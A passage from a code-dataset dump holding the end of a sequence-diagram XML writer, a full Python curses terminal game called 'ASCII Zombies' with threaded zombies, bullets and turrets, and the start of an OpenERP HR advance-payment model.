self.fragments:\n fragment.fragments_to_xml(f)\n\n f.write(\"\\t\\n\")\n\n def create_sequence_diagrams_xml(self, f):\n for diagram in self.sequence_diagrams:\n\n m_count = 0\n f_count = 0\n\n f.write(\n \"\\t\\n\".format(\n diagram.name, diagram.guard\n )\n )\n\n for i in diagram.elements:\n\n if i == 0:\n diagram.xml_message_by_position(m_count, f)\n m_count += 1\n\n elif i == 1:\n diagram.xml_fragment_by_position(f_count, f)\n f_count += 1\n\n f.write(\"\\t\\n\")\n\n def create_xml(self, activity):\n f = open(\"sequence_diagram_activity_{}.xml\".format(activity), \"w\")\n\n f.write(\"\\n\")\n\n self.create_lifelines_xml(f)\n self.create_fragments_xml(f)\n self.create_sequence_diagrams_xml(f)\n\n f.write(\"\\n\")\n\n f.close()\n","sub_path":"src/sequence/sequence_diagrams.py","file_name":"sequence_diagrams.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"614548726","text":"import curses\nimport random\nimport sys\nimport threading\nfrom threading import Thread\nimport time\nimport subprocess\nimport queue\nfrom random import randint\nimport math\n# $ python3.7 -m pip install pygame\nimport pygame #make sure we can install on user's computers.. {maybe do an install from source for deployment!}\nfrom pygame.locals import *\nfrom pygame import mixer\nimport numpy as np #non stl.. $ pip3 install numpy # $python3.7 -m pip install numpy\n\n\n####### #######\n\n#premature optimization is the root of all evil!\n\n\n####### ########\n\n\n####### INITILIZATIONZ ###########\n\ns = curses.initscr()\ncurses.curs_set(0)\nsh, sw = s.getmaxyx() #TODO CREATE A SET SCREEN SIZE.\nwindow = curses.newwin(sh, sw, 0, 0)\nbarWindow = curses.newwin(sh//4, sw//4, 5, 5)\n\nwindow.nodelay(True) #does this actually work?\nbarWindow.nodelay(True)\n\nwindow.keypad(1) #What does this do?\nbarWindow.keypad(1)\n\ncurses.start_color()\ncurses.noecho()\n\ntime_start = time.time()\nlast_time_fired = time.time()\nhero_func_first_run = 1\nzomb_func_first_run = 1\n\nwindow.border(0)\nwindow.timeout(100) #and this?\n\n#the pygame init function was causing a lot of errors\n#pygame.mixer.init(44100, -16,2,2048) #I dunno what all these numbers do.. but it makes the sound work! :P\nmixer.init()\n\nold_health = 3\nold_points = 10\n#old_health_bar = \"❤\" * old_health\nbullet_row = 1\nbullet_col = 1\n####### ###########\n\nclass finishLine:\n row0 = \" E +\"\n row1 = \" E +\"\n row2 = \" E +\"\n row3 = \" E +\"\n row4 = \" E +\"\n row5 = \" E +\"\n row6 = \" E +\"\n row7 = \" E +\"\n row8 = \" R +\"\n rows = [row0, row1, row2, row3, row4, row5, row6, row7, row8]\n num_rows_or_height = 9\n width_or_length = 5\n\n\nclass turret:\n\n col = 0\n row = 0\n health = 10\n\n facing_up_ln1 = \"++||++\"\n facing_up_ln2 = \"+ [] +\"\n facing_up_ln3 = \"++++++\"\n \n facing_down_ln1 = \"++++++\"\n facing_down_ln2 = \"+ [] +\"\n facing_down_ln3 = \"++||++\"\n \n facing_right_ln1 = \"++++++\"\n facing_right_ln2 = \"+ I===\"\n facing_right_ln3 = \"++++++\"\n\n facing_left_ln1 = \"++++++\"\n facing_left_ln2 = \"===I +\"\n facing_left_ln3 = \"++++++\"\n\n len_of_row = 6\n\nclass hero:\n col = 0\n row = 0\n health = 3\n points = 0\n\n spriteRest = \"┌(ᶱ1ᶱ)┐\"\n\n spriteMove1 = \"┌(ᶱ1ᶱ)┘\"\n spriteMoveFired1 = \"┌(ᶱ.ᶱ)┘\"\n\n spriteMove2 = \"└(ᶱ1ᶱ)┐\"\n spriteMoveFired2 = \"└(ᶱ.ᶱ)┐\"\n len_of_sprite = 7 #UPDATE IF MORE SPRITES COME\n\n hero_sprite_type = 1\n\n\n\nclass zombie:\n col = sw - (sw // 20)\n row = 0\n\n zombie_sprite_left_attack_head ='~{#_#}'\n zombie_sprite_right_attack_head ='{#_#}~' #TODO make bodies too and implement\n \n zombie_sprite_head = \"{#_#}\"\n zombie_sprite_body = '(o)'\n\n len_of_row0 = 5\n len_of_row1 = 3\n offset_of_row1 = 1\n zombie_ID = 1\n alive = True\n\nclass environment:\n lock = threading.Lock()\n player = hero() \n zombie_list = list()\n hero_sprite = ''\n turrets = list()\n playerTurret = turret()\n turret_queue = queue.Queue()\n bullet_queue = queue.Queue()\n checkerboard = np.zeros((sh,sw),dtype=int) \n\n #0 for nothing there, -1 for player, -10 to -20 for turret, -5 for walls,\n # 1 to inf correspond to zombos, -99 is finish line\n\ndef draw_finish_line(env):\n \n pos = [sh//2 + finishLine.num_rows_or_height//2, 1 ]\n \n for x in range(0, finishLine.num_rows_or_height):\n for i in range(0,finishLine.width_or_length):\n env.checkerboard[pos[0]-x][pos[1]+i] = -99\n window.addstr(pos[0]-x,pos[1], finishLine.rows[x])\n\n\ndef create_bounds(env):\n for col in range(0,sw):\n env.checkerboard[0][col] = -5\n env.checkerboard[sh-1][col] = -5\n \n for row in range(0,sh):\n env.checkerboard[row][0] = -5\n env.checkerboard[row][sw-1] = -5\n \n\ndef dynamic_print(timeSpan, x, y, text, color):\n\n tempX = x\n\n for i in range(len(text)):\n window.addstr(y, tempX, text[i], curses.color_pair(color))\n window.refresh()\n time.sleep(timeSpan)\n tempX+=1\n\n\ndef boundError(x, y):\n\n if(x > sw or y > sh):\n print(\"Values are not within bounds\")\n return True\n\n return False\n\ndef drawHealthBar(x, y, health):\n\n global old_health\n #global old_health_bar\n\n if(health != old_health):\n\n old_health_bar = \"❤ \" * old_health\n clear_sprite(y, x + 8, old_health_bar)\n old_health = health\n\n if(not boundError(x, y)):\n window.addstr(y, x, \"Health: \", curses.A_BOLD)\n\n if(not boundError(x + 8, y)):\n \n RED_TEXT = 1\n curses.init_pair(RED_TEXT, curses.COLOR_RED, curses.COLOR_BLACK)\n\n bar = \"❤ \" * health\n # old_health_bar = bar\n window.addstr(y, x + 8, bar, curses.color_pair(RED_TEXT))\n\ndef drawPointBar(x, y, points):\n\n global old_points\n\n if(points != old_points):\n\n old_points_bar = \"$ \" * old_points\n clear_sprite(y, x + 8, old_points_bar)\n old_points = points\n\n if(not boundError(x, y)):\n window.addstr(y, x, \"Points: \", curses.A_BOLD)\n\n if(not boundError(x + 8, y)):\n \n YELLOW_TEXT = 2\n curses.init_pair(YELLOW_TEXT, curses.COLOR_YELLOW, curses.COLOR_BLACK)\n\n bar = \"$ \" * points\n window.addstr(y, x + 8, bar, curses.color_pair(YELLOW_TEXT))\n\ndef init_map(env, lock):\n env.lock = lock\n \n hero_x = sw // 4\n hero_y = sh // 2\n\n env.player.row = hero_y\n env.player.col = hero_x\n\n #starting with 3 zombies \n # ATTENTION: zombie ID in zombie class initialize is 1\n # Since all the zombie >=1\n for i in range (0,3):\n eachZombie = zombie()\n eachZombie.zombie_ID = i + 1\n eachZombie.row = randint(0,sh - (sh // 5)) # create zombie at random position\n eachZombie.col = randint(sw - (sw // 10),sw - (sw // 20))\n env.zombie_list.append(eachZombie) \n\n #sets the initial sprite for the player\n env.hero_sprite = env.player.spriteRest\n\n draw_finish_line(env)\n create_bounds(env)\n \n\ndef display_intro_message():\n\n song = mixer.Sound('ost_1_SQ.wav') #works!\n song.play()\n\n YELLOW_TEXT = 1\n RED_TEXT = 2\n\n scale = 0.15 #time scale\n\n curses.init_pair(YELLOW_TEXT, curses.COLOR_YELLOW, curses.COLOR_BLACK)\n\n dynamic_print(0.2*scale,(sw // 2) - 15, (sh // 2) - 5, \"Sudochad Stud|os presents ...\", YELLOW_TEXT)\n time.sleep(3*scale)\n dynamic_print(0.1*scale, (sw // 2) - 15, (sh // 2) - 5, \" \", YELLOW_TEXT)\n \n curses.init_pair(RED_TEXT, curses.COLOR_RED, curses.COLOR_BLACK)\n dynamic_print(0.5*scale, (sw // 2) - 10, (sh // 2), \"ASCII ZOMBIES\", RED_TEXT)\n time.sleep(2*scale)\n dynamic_print(0.05*scale, (sw // 2) - 10, (sh // 2), \" \", RED_TEXT)\n\n\ndef display_title():\n\n sys.stdout.flush()\n \n crash_sound = pygame.mixer.Sound(\"crash.wav\")\n pygame.mixer.Sound.play(crash_sound)\n\n pygame.mixer.music.load('jazz.wav') #works!\n pygame.mixer.music.play(-1)\n \n text = \"Sudochad Stud|os presents...\"\n for character in text:\n print(character, end = \"\")\n time.sleep(0.125) #sexy but too slow for debugging\n #time.sleep(.03)\n sys.stdout.flush()\n time.sleep(.12)\n\n## should be run inside a locked function body!\ndef place_sprite(y, x, sprite):\n if y < sh and y >= 0:\n if x < sw and x >= 0:\n window.addstr(int(y),int(x), sprite)\n\n## should be run inside a locked function body!\ndef clear_sprite(y, x, sprite):\n\n space = \" \" * len(sprite)\n if y < sh and y >= 0:\n if x < sw and x >= 0:\n window.addstr(int(y),int(x), space)\n # str_size = len(sprite)\n # spaces_str = \"\"\n # for i in (0,str_size):\n # spaces_str += \" \"\n\n\ndef move_hero(env, keypress):\n\n global last_time_fired\n \n global hero_func_first_run\n \n env.lock.acquire() ####### (;\n\n key = keypress\n\n bulletFired = False\n \n old_pos = [env.player.row, env.player.col]\n new_pos = [env.player.row, env.player.col]\n \n if key == curses.KEY_DOWN:\n new_pos = [env.player.row + 1, env.player.col]\n \n elif key == curses.KEY_UP:\n new_pos = [env.player.row - 1, env.player.col]\n \n elif key == curses.KEY_LEFT:\n new_pos = [env.player.row, env.player.col - 1]\n \n elif key == curses.KEY_RIGHT:\n new_pos = [env.player.row, env.player.col + 1]\n \n place_if_valid(env,old_pos,new_pos,-1)\n \n\n if key == ord('d') or key == ord('D') or key == ord('a') or key == ord('A') or key == ord('s') or key == ord('S') or key == ord('w') or key == ord('W'):\n bulletFired = True\n #s drawExplosion(, bullet_col)\n if(time.time() > (last_time_fired)+ 0.3):\n last_time_fired = time.time()\n if key == ord('d') or key == ord('D'):\n bullet_info = [new_pos,'right','•'] #WARNING, IF YOU CHANGE THE BULLET CHARACTERS, YOU'LL BREAK THE POINTS\n env.bullet_queue.put(bullet_info)\n elif key == ord('a') or key == ord('A'):\n bullet_info = [new_pos,'left','•']\n env.bullet_queue.put(bullet_info)\n elif key == ord('w') or key == ord('W'):\n bullet_info = [new_pos,'up','•']\n env.bullet_queue.put(bullet_info)\n elif key == ord('s') or key == ord('S'):\n bullet_info = [new_pos,'down','•']\n env.bullet_queue.put(bullet_info)\n \n if env.player.points >= 10:\n window.addstr((sh // 2) - ((sh // 2) - 2), (sw // 2) - ((sw // 2) - 30), \"Press E to build a turret\", curses.A_BLINK)\n\n if key == ord('e'):\n clear_sprite((sh // 2) - ((sh // 2) - 2), (sw // 2) - ((sw // 2) - 30), \"Press E to build a turret\")\n env.turrets.append(turret())\n env.turrets[-1].row = env.player.row\n env.turrets[-1].col = env.player.col + 10\n place_turret(env.turrets[-1].col, env.turrets[-1].row, \"up\", env)\n\n env.player.points -= 10\n\n elif key == ord('i'):\n env.player.points+=1\n \n if env.player.hero_sprite_type == 1:\n if bulletFired:\n env.hero_sprite = env.player.spriteMoveFired1\n else:\n env.hero_sprite = env.player.spriteMove1\n elif env.player.hero_sprite_type == 2:\n if bulletFired:\n env.hero_sprite = env.player.spriteMoveFired2\n else:\n env.hero_sprite = env.player.spriteMove2\n\n env.player.hero_sprite_type = 0\n \n env.player.hero_sprite_type+=1\n env.lock.release() \n\ndef move_baddies(env, counter, timeValue):\n \"\"\"\n this function is run in a seperate thread. It will move\n all the zombie into the new location.\n \"\"\"\n\n while(1):\n env.lock.acquire()\n\n newZombies = 0\n if (counter == 10):\n newZombies = int (math.e ** (timeValue/5))\n counter = 0\n timeValue += 1\n\n i = 0\n for i in range (0,newZombies):\n eachZombie = zombie()\n eachZombie.zombie_ID = len(env.zombie_list) + 1\n eachZombie.row = randint(0,sh - (sh // 5)) # create zombie at random position\n eachZombie.col = randint(sw - (sw // 10),sw - (sw // 20))\n env.zombie_list.append(eachZombie) \n\n #target = [env.player.row, env.player.col+2] # + 2 for near middle of hero's body\n target = [sh//2 + finishLine.num_rows_or_height//2, 1 ]\n\n for each_zombie in env.zombie_list:\n if each_zombie.alive:\n\n if(random.randint(1,10)==1):\n target = [env.player.row, env.player.col+2] # + 2 for near middle of hero's body\n\n if each_zombie.row < target[0] and random.randint(1,10) > 2:\n new_pos = [each_zombie.row+1,each_zombie.col]\n old_pos = [each_zombie.row,each_zombie.col]\n place_if_valid(env,old_pos,new_pos, each_zombie.zombie_ID)\n #elif each_zombie.row > target[0]:\n else:\n new_pos = [each_zombie.row-1,each_zombie.col]\n old_pos = [each_zombie.row,each_zombie.col]\n place_if_valid(env,old_pos,new_pos, each_zombie.zombie_ID)\n \n\n if each_zombie.col < target[1]:\n new_pos = [each_zombie.row,each_zombie.col+1]\n old_pos = [each_zombie.row,each_zombie.col]\n place_if_valid(env,old_pos,new_pos, each_zombie.zombie_ID)\n \n elif each_zombie.col > target[1]:\n new_pos = [each_zombie.row,each_zombie.col-1]\n old_pos = [each_zombie.row,each_zombie.col]\n place_if_valid(env,old_pos,new_pos, each_zombie.zombie_ID)\n\n if (timeValue > 23):\n timeValue = 23\n\n counter += 1\n env.lock.release()\n time.sleep(0.4) #SPEED UP OR SLOW DOWN THE GAME WITH THIS..LAG FIX OR LAG ++\n\n\ndef fire_turret(env, tur, dir):\n \n if dir == \"right\":\n dist = 30\n for i in range(0,dist):\n env.lock.acquire()\n\n bullet_origin = [tur.row + 1, tur.col + 6]\n bullet_type = '@'\n \n clear_sprite(bullet_origin[0], bullet_origin[1]+i-1, ' ')\n place_sprite(bullet_origin[0], bullet_origin[1]+i, bullet_type)\n bullet_row = bullet_origin[0]\n bullet_col = bullet_origin[1] + i\n \n if( i == dist//2):\n shrapnel_origin = [bullet_row, bullet_col]\n bullet_info = [shrapnel_origin,'up','±']\n bullet_info2 = [shrapnel_origin,'down','±']\n env.bullet_queue.put(bullet_info)\n env.bullet_queue.put(bullet_info2)\n\n if killZombie(env, bullet_row, bullet_col):\n env.player.points -= 1 #no extra points!\n clear_sprite(bullet_origin[0], bullet_origin[1]+i-1, ' ')\n env.lock.release() \n return True\n \n env.lock.release()\n time.sleep(0.02) \n\n elif dir == \"left\":\n dist = 30\n for i in range(0,dist):\n env.lock.acquire()\n\n bullet_origin = [tur.row + 1, tur.col - 2]\n bullet_type = '@'\n \n clear_sprite(bullet_origin[0], bullet_origin[1]-i+1, ' ')\n place_sprite(bullet_origin[0], bullet_origin[1]-i, bullet_type)\n bullet_row = bullet_origin[0]\n bullet_col = bullet_origin[1] - i\n \n if( i == dist//2):\n shrapnel_origin = [bullet_row, bullet_col]\n bullet_info = [shrapnel_origin,'up','±']\n bullet_info2 = [shrapnel_origin,'down','±']\n env.bullet_queue.put(bullet_info)\n env.bullet_queue.put(bullet_info2)\n\n if killZombie(env, bullet_row, bullet_col):\n env.player.points -= 1 #no extra points!\n clear_sprite(bullet_origin[0], bullet_origin[1]-i+1, ' ')\n env.lock.release() \n return True\n \n env.lock.release()\n time.sleep(0.02) \n\n elif dir == \"down\":\n dist = 10\n for i in range(0,dist):\n\n env.lock.acquire()\n\n bullet_origin = [tur.row + 3, tur.col + 3]\n bullet_type = '@'\n\n clear_sprite(bullet_origin[0]+i-1, bullet_origin[1], ' ')\n place_sprite(bullet_origin[0]+i, bullet_origin[1], bullet_type)\n bullet_row = bullet_origin[0]+i\n bullet_col = bullet_origin[1]\n\n if( i == dist//2):\n shrapnel_origin = [bullet_row, bullet_col]\n bullet_info = [shrapnel_origin,'left','¥']\n bullet_info2 = [shrapnel_origin,'right','¥']\n env.bullet_queue.put(bullet_info)\n env.bullet_queue.put(bullet_info2)\n \n if killZombie(env, bullet_row, bullet_col):\n env.player.points -= 1 #no extra points!\n clear_sprite(bullet_origin[0]+i-1, bullet_origin[1], ' ')\n env.lock.release() \n return True\n\n env.lock.release()\n time.sleep(0.02) \n\n elif dir == \"up\":\n dist = 10\n for i in range(0,dist):\n\n env.lock.acquire()\n\n bullet_origin = [tur.row - 1, tur.col + 3]\n bullet_type = '@'\n\n clear_sprite(bullet_origin[0]-i+1, bullet_origin[1], ' ')\n place_sprite(bullet_origin[0]-i, bullet_origin[1], bullet_type)\n bullet_row = bullet_origin[0]-i\n bullet_col = bullet_origin[1]\n\n if( i == dist//2):\n shrapnel_origin = [bullet_row, bullet_col]\n bullet_info = [shrapnel_origin,'left','¥']\n bullet_info2 = [shrapnel_origin,'right','¥']\n env.bullet_queue.put(bullet_info)\n env.bullet_queue.put(bullet_info2)\n \n if killZombie(env, bullet_row, bullet_col):\n env.player.points -= 1 #no extra points!\n clear_sprite(bullet_origin[0]-i+1, bullet_origin[1], ' ')\n env.lock.release() \n return True\n\n env.lock.release()\n time.sleep(0.02) \n\n\ndef automateTurret2(env):\n\n while 1:\n\n time.sleep(0.75)\n if len(env.turrets) > 0:\n env.lock.acquire()\n for tur in env.turrets:\n \n horiz_targeting_dist = 6+14\n vert_targeting_dist = 3+6\n\n #target right randomly\n if(random.randint(0,1)):\n \n place_turret(tur.col, tur.row, \"right\", env)\n\n for rcols in range(0,horiz_targeting_dist, 4):\n\n if tur.col + rcols < sw :\n if env.checkerboard[tur.row][tur.col + rcols] >= 1:\n env.lock.release()\n fire_turret(env, tur, \"right\")\n env.lock.acquire()\n\n #target left randomly #!\n if(random.randint(0,1)):\n \n place_turret(tur.col, tur.row, \"left\", env)\n\n for lcols in range(0,horiz_targeting_dist, 4):\n\n if tur.col - lcols > 1 :\n if env.checkerboard[tur.row][tur.col - lcols] >= 1:\n env.lock.release()\n fire_turret(env, tur, \"left\")\n env.lock.acquire()\n \n\n #target down randomly\n elif(random.randint(0,1)):\n\n place_turret(tur.col, tur.row, \"down\", env)\n\n for drows in range(0, vert_targeting_dist):\n\n if tur.row + drows < sh:\n if env.checkerboard[tur.row + drows][tur.col] >= 1:\n env.lock.release()\n fire_turret(env, tur, \"down\")\n env.lock.acquire()\n\n #target up randomly\n elif(random.randint(0,1)):\n\n place_turret(tur.col, tur.row, \"up\", env)\n\n for urows in range(0, vert_targeting_dist):\n\n if tur.row - urows > 1:\n if env.checkerboard[tur.row - urows][tur.col] >= 1:\n env.lock.release()\n fire_turret(env, tur, \"up\")\n env.lock.acquire()\n\n env.lock.release()\n\n \ndef place_turret(x, y, direction, env):\n\n for cols in range(0, 6):\n env.checkerboard[y][x+cols] = -10\n env.checkerboard[y+1][x+cols] = -10\n env.checkerboard[y+2][x+cols] = -10\n \n if(direction == \"up\"):\n window.addstr(y, x, env.playerTurret.facing_up_ln1)\n window.addstr(y + 1, x, env.playerTurret.facing_up_ln2)\n window.addstr(y + 2, x, env.playerTurret.facing_up_ln3)\n\n elif(direction == \"down\"):\n window.addstr(y, x, env.playerTurret.facing_down_ln1)\n window.addstr(y + 1, x, env.playerTurret.facing_down_ln2)\n window.addstr(y + 2, x, env.playerTurret.facing_down_ln3)\n\n elif(direction == \"left\"):\n window.addstr(y, x, env.playerTurret.facing_left_ln1)\n window.addstr(y + 1, x, env.playerTurret.facing_left_ln2)\n window.addstr(y + 2, x, env.playerTurret.facing_left_ln3)\n\n elif(direction == \"right\"):\n window.addstr(y, x, env.playerTurret.facing_right_ln1)\n window.addstr(y + 1, x, env.playerTurret.facing_right_ln2)\n window.addstr(y + 2, x, env.playerTurret.facing_right_ln3)\n\ndef clear_turret(x, y, direction, env):\n\n clear_sprite(y, x, env.playerTurret.facing_up_ln1)\n clear_sprite(y + 1, x, env.playerTurret.facing_up_ln2)\n clear_sprite(y + 2, x, env.playerTurret.facing_up_ln3)\n \n\ndef verify_player_row(row, col, env, character_ID):\n\n for i in range(0,env.player.len_of_sprite):\n if(env.checkerboard[row][col+i] != 0 and env.checkerboard[row][col+i] != character_ID):\n return False\n return True\n\ndef verify_zombie_rows(row, col, env, offset, character_ID, ZOMBIE): \n \"\"\"\n game over happens thru here. also -\n This function verifies if the location is valid to either\n having a new zombie appear in this location or having an\n existing zombie move to this location. The function return\n false for the bad location and true for good location.\n \"\"\"\n for i in range(0,ZOMBIE.len_of_row0):\n if(env.checkerboard[row][col+i] != 0 and env.checkerboard[row][col+i] != character_ID):\n \n if(env.checkerboard[row][col+i] == -1): #hit the player\n \n env.player.health -= 1\n if(env.player.health < 1):\n game_over()\n\n elif(env.checkerboard[row][col+i] == -99):\n game_over()\n \n return False\n \n for i in range(0,ZOMBIE.len_of_row1):\n if(env.checkerboard[row+1][col+i+offset] != 0 and env.checkerboard[row+1][col+i+offset] != character_ID ):\n \n if(env.checkerboard[row][col+i] == -1): #hit the player\n \n env.player.health -= 1\n if(env.player.health < 1):\n game_over()\n\n elif(env.checkerboard[row][col+i] == -99):\n game_over()\n\n return False\n\n return True\n\n\ndef clear_player_row(row, col, env):\n\n for i in range(0,env.player.len_of_sprite):\n env.checkerboard[row][col+i] = 0\n window.addch(row, col + i, ' ')\n\ndef clear_zombie_rows(row, col, env, offset, ZOMBIE):\n \"\"\"\n This function take in the old location of the zombie\n and clear it.\n \"\"\"\n for i in range(0,ZOMBIE.len_of_row0):\n env.checkerboard[row][col+i] = 0\n window.addch(row, col + i, ' ')\n \n for i in range(0,ZOMBIE.len_of_row1):\n env.checkerboard[row+1][col+i+offset] = 0\n window.addch(row+1, col + i + offset, ' ')\n\ndef place_player(row, col, env):\n\n for i in range(0,env.player.len_of_sprite):\n env.checkerboard[row][col+i] = -1\n window.addch(row, col + i, env.hero_sprite[i])\n \n################################################ Finish Changing ######################################\n\ndef place_zombie_rows(row, col, offset, env, character_ID, ZOMBIE):\n \"\"\"\n This function will place the zombie into the new location\n \"\"\"\n for i in range(0,ZOMBIE.len_of_row0):\n env.checkerboard[row][col+i] = character_ID\n window.addch(row, col+i, ZOMBIE.zombie_sprite_head[i])\n \n for i in range(0,ZOMBIE.len_of_row1):\n env.checkerboard[row+1][col+i+offset] = character_ID\n window.addch(row+1, col+i+offset, ZOMBIE.zombie_sprite_body[i])\n\n################################################ Finish Changing ######################################\n\n#character ID: zombie = range(1,999), hero = -1 , etc..\ndef place_if_valid(env, old_origin, new_origin, character_ID):\n \n #first check if placement is valid\n #then wipe old \n #place new\n newrow = new_origin[0]\n newcol = new_origin[1]\n oldrow = old_origin[0]\n oldcol = old_origin[1]\n \n #Player\n if(character_ID == -1):\n #checks if \n if verify_player_row(newrow, newcol, env, character_ID):\n\n #wipe\n clear_player_row(oldrow, oldcol, env)\n\n #place\n place_player(newrow, newcol, env)\n \n env.player.row = newrow\n env.player.col = newcol\n return True\n else:\n return False\n\n # TODO change baddy to specific zombie\n elif(character_ID >= 1):\n\n offset = 1 #env.zombie.offset_of_row1\n ZOMBIE = env.zombie_list[character_ID - 1] #get the right zombie from the list\n\n if verify_zombie_rows(newrow, newcol, env, offset, character_ID, ZOMBIE):\n\n clear_zombie_rows(oldrow, oldcol, env, offset, ZOMBIE)\n \n place_zombie_rows(newrow, newcol, offset, env, character_ID, ZOMBIE)\n\n ZOMBIE.row = newrow\n ZOMBIE.col = newcol\n return True\n else:\n return False\n\n #Turret\n if(character_ID <= -10 and character_ID >= -20):\n for i in range(0, env.playerTurret.len_of_row):\n env.checkerboard[env.player.row][env.player.col + 10] = character_ID\n \n \ndef drawExplosion(y, x):\n place_sprite(y, x, \"ꙮ\")\n place_sprite(y, x, \"꙰\")\n # time.sleep(0.25)\n # clear_sprite(y, x, \"ꙮ\")\n #clear_sprite(y, x, \"꙰\")\n\n#run in a locked function!\ndef killZombie(env, bullet_row, bullet_col):\n \"\"\"\n This function is to compare the location of bullet vs zombie\n if bullet hits a zombie, it will erase zombie from the board\n and delete zombie from zombie_list\n \"\"\"\n if bullet_row < sh and bullet_row >= 0:\n if bullet_col < sw and bullet_col >= 0:\n zombieID = env.checkerboard[bullet_row][bullet_col]\n if (zombieID >= 1):\n death_zombie = env.zombie_list[zombieID-1]\n death_zombie.alive = False\n clear_zombie_rows(death_zombie.row, death_zombie.col, env, 1, death_zombie)\n env.player.points += 1\n return True\n return False\n\n\ndef fireBullet(env): \n while 1:\n bullet_info = None\n try:\n bullet_info = env.bullet_queue.get_nowait() #this should be fine to do before lock.aquire() ..even though it's odd.\n except:\n pass\n if bullet_info is not None:\n bullet_origin = bullet_info[0]\n bullet_direction = bullet_info[1] \n bullet_type = bullet_info[2] \n # vert_range = 8 \n # horiz_range = 20 \n distance = (sw // 5)\n if(bullet_type == '±'): #for shrapnel!\n distance = 6\n elif(bullet_type == '¥'):\n distance = 3\n for i in range(1,distance):\n env.lock.acquire()\n \n if(bullet_direction == \"right\"):\n clear_sprite(bullet_origin[0], bullet_origin[1]+i-1, ' ')\n place_sprite(bullet_origin[0], bullet_origin[1]+i, bullet_type)\n bullet_row = bullet_origin[0]\n bullet_col = bullet_origin[1] + i\n if killZombie(env, bullet_row, bullet_col):\n if(bullet_type != '•'): #then a turret fired it.\n env.player.points -= 1 #no extra points!\n env.lock.release() \n break\n\n elif(bullet_direction == \"left\"):\n clear_sprite(bullet_origin[0], bullet_origin[1]-i+1, ' ')\n place_sprite(bullet_origin[0], bullet_origin[1]-i, bullet_type)\n bullet_row = bullet_origin[0]\n bullet_col = bullet_origin[1] - i\n if killZombie(env, bullet_row, bullet_col):\n if(bullet_type != '•'): #then a turret fired it.\n env.player.points -= 1 #no extra points!\n env.lock.release() \n break\n\n elif(bullet_direction == \"up\"):\n clear_sprite(bullet_origin[0]-i+1, bullet_origin[1], ' ')\n place_sprite(bullet_origin[0]-i, bullet_origin[1], bullet_type)\n bullet_row = bullet_origin[0] - i\n bullet_col = bullet_origin[1]\n if killZombie(env, bullet_row, bullet_col):\n if(bullet_type != '•'): #then a turret fired it.\n env.player.points -= 1 #no extra points!\n env.lock.release() \n break\n\n elif(bullet_direction == \"down\"):\n clear_sprite(bullet_origin[0]+i-1, bullet_origin[1], ' ')\n place_sprite(bullet_origin[0]+i, bullet_origin[1], bullet_type)\n bullet_row = bullet_origin[0] + i\n bullet_col = bullet_origin[1]\n if killZombie(env, bullet_row, bullet_col):\n if(bullet_type != '•'): #then a turret fired it.\n env.player.points -= 1 #no extra points!\n env.lock.release() \n break\n \n \n env.lock.release()\n time.sleep(0.01) \n \n env.lock.acquire()\n if(bullet_direction == \"right\"):\n clear_sprite(bullet_origin[0], bullet_origin[1]+distance-1, ' ')\n elif(bullet_direction == \"left\"):\n clear_sprite(bullet_origin[0], bullet_origin[1]-distance+1, ' ')\n elif(bullet_direction == \"up\"):\n clear_sprite(bullet_origin[0]-distance+1, bullet_origin[1], ' ')\n elif(bullet_direction == \"down\"):\n clear_sprite(bullet_origin[0]+distance-1, bullet_origin[1], ' ')\n env.lock.release()\n \n\ndef game_over():\n window.clear()\n window.addstr(int(sh//2),int(sw//2),\"u lose.\")\n time.sleep(1)\n subprocess.call([\"reset\"])\n quit() \n\n\n\ndef main():\n\n display_intro_message()\n\n env = environment()\n lock = threading.Lock()\n init_map(env, lock)\n\n counter = 0\n timeValue = 0\n \n \n baddies_thread = Thread(target=move_baddies,args=(env, counter, timeValue, ))\n baddies_thread.daemon = True #exit when main exits\n baddies_thread.start() \n\n bullets_thread = Thread(target=fireBullet,args=(env,))\n bullets_thread.daemon = True #exit when main exits\n bullets_thread.start() \n\n #turrets_thread = Thread(target=automateTurret1, args=(env,))\n turrets_thread = Thread(target=automateTurret2, args=(env,))\n turrets_thread.daemon = True #exit when main exits\n turrets_thread.start()\n\n while True: #TODO stop shit from going off screen and breaking the program lol\n key = window.getch() \n if key == ord('p'): \n curses.endwin()\n subprocess.call([\"reset\"])\n quit() # TODO MAKE A PAUSE SCREEN? IF WE HAVE TIME.\n else:\n move_hero(env, key)\n\n #window.border(0)\n\n drawHealthBar((sw // 2) - ((sw // 2) - 1), (sh // 2) - ((sh // 2) - 1), env.player.health)\n drawPointBar((sw // 2) - ((sw // 2) - 1), (sh // 2) - ((sh // 2) - 2), env.player.points)\n\n \n ## DONT FORGET TO JOIN THY THREADS!\n baddies_thread.join()\n bullets_thread.join()\n turrets_thread.join()\n\n curses.endwin()\n subprocess.call([\"reset\"])\n\"\"\"\n\n ◖========8 ############################## leggo baby. ################################ 8========D\n\n\"\"\"\n\nmain()\n","sub_path":"codeSkeletonV0.py","file_name":"codeSkeletonV0.py","file_ext":"py","file_size_in_byte":32282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"93729437","text":"import datetime\nimport time\nfrom itertools import groupby\nfrom operator import itemgetter\n\nimport math\nfrom openerp import netsvc\nfrom openerp import tools\nfrom openerp.osv import fields, osv\nfrom openerp.tools.translate import _\nfrom openerp.tools import DEFAULT_SERVER_DATE_FORMAT, DEFAULT_SERVER_DATETIME_FORMAT, DATETIME_FORMATS_MAP, float_compare\n\nclass hr_advance_payment(osv.osv):\n _name = \"hr.advance.payment\"\n \n def _get_user_department(self, cr, uid, ids, field_name, arg, context=None):\n employee_pool = self.pool.get('hr.employee')\n res = {}\n for attendance in self.browse(cr, uid, ids, context=context):\n res[attendance.id] = attendance.employee_id.department_id and attendance.employee_id.department_id.id or False\n return res\n \n _columns ={\n 'name':fields.char('Description',size=128), \n 'employee_id':fields.many2one('hr.employee','Employee',required=True, readonly=True, states={'draft': [('readonly', False)]}),\n 'date':fields.date('Date',required=True, readonly=True, states={'draft': [('readonly', False)]}),\n 'amount':fields.float('Amount', digits=(16,2), required=True, readonly=True, states={'draft': [('readonly', False)]}),\n 'currency_id': fields.many2one('res.currency', 'Currency', required=True, readonly=True, states={'draft': [('readonly', False)]}),\n 'exchange_rate':fields.float('Exchange Rate', digits=(16,2), required=True, readonly=True, states={'draft': [('readonly', False)]}),\n 'user_id': fields.many2one('res.users', 'Created by', required=True, readonly=True, states={'draft': [('readonly', False)]}),\n 'approved_by': fields.many2one('res.users', 'Approved by', readonly=True),\n \n 'department_id': 